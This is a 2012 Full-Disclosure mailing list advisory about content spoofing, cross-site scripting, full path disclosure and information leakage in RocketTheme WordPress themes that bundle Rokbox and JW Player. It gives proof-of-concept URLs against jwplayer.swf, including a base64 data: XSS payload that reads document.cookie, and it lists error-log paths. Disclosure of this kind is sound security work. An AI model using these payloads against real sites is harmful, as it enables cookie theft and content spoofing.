lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <005801cde60f$7cf91910$9b7a6fd5@pc>
Date: Sat, 29 Dec 2012 23:56:50 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Multiple vulnerabilities in RocketTheme themes
	for WordPress

Hello list!

Earlier I've wrote to the list about multiple vulnerabilities in multiple 
themes for WordPress (http://seclists.org/fulldisclosure/2012/Dec/236). In 
that later I've mentioned 16 themes by RocketTheme (with Rokbox): 
Afterburner, Refraction, Solarsentinel, Mixxmag, Iridium, Infuse, 
Perihelion, Replicant2, Affinity, Nexus, Sentinel, Mynxx Vestnikp, Mynxx, 
Moxy, Terrantribune, Meridian.

I've wrote about 14 themes + 2 variations of 2 themes by these developers, 
but they have 47 themes for WordPress in total. Among them only three are 
free, and all other themes from RocketTheme are paid ones (it's needed to 
buy subscription to the club to receive access to them). And Rokbox is 
bundled with all these themes, except Grunge, which have all 
earlier-mentioned vulnerabilities.

So I inform you about multiple vulnerabilities in 33 new themes for 
WordPress, which are developed by RocketTheme (Rokbox's developers). These 
are Content Spoofing, Cross-Site Scripting, Full path disclosure and 
Information Leakage vulnerabilities.

-------------------------
Affected products:
-------------------------

In these 32 themes (in addition to previous 16) there are Cross-Site 
Scripting, Content Spoofing, Full path disclosure and Information Leakage 
vulnerabilities. And Grunge theme has FPD holes.

These are the next themes by RocketTheme: Voxel, Diametric, Ionosphere, 
Clarion, Halcyon, Visage, Enigma, Momentum, Radiance, Camber, Reflex, 
Modulus, Nebulae, Entropy, Tachyon, Mercado, Maelstrom, Syndicate, Paradox, 
Hybrid, Omnicron, Zephyr, Panacea, Somaxiom, Juxta, Quantive, Crystalline, 
Kinetic, Dominion, Reaction, Akiraka, Novus and Grunge.

Affected all versions of these themes for WordPress.

Since August I've informed the developers many times concerning 
vulnerabilities in Rokbox and their themes with it.

----------
Details:
----------

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and 
image, which allows to spoof content of flash - i.e. by setting addresses of 
video (audio) and/or image files from other site.

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which 
allows to spoof content of flash - i.e. by setting address of config file 
from other site (parameters file and image in xml-file accept arbitrary 
addresses). For loading of config file from other site it needs to have 
crossdomain.xml.

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml

1.xml

<config>
  <file>1.flv</file>
  <image>1.jpg</image>
</config>

Content Spoofing (WASC-12):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

XSS (WASC-08):

http://site/wordpress/wp-content/themes/rt_novus_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Full path disclosure (WASC-13):

In all these themes there is FPD in index.php 
(http://site/wordpress/wp-content/themes/rt_novus_wp/ and the same for other 
themes), which works at default PHP settings. Also potentially there are FPD 
in other php-files of these themes.

Information Leakage (WASC-13):

In some themes, similar to rt_mixxmag_wp, there can be error log with full 
paths.

http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ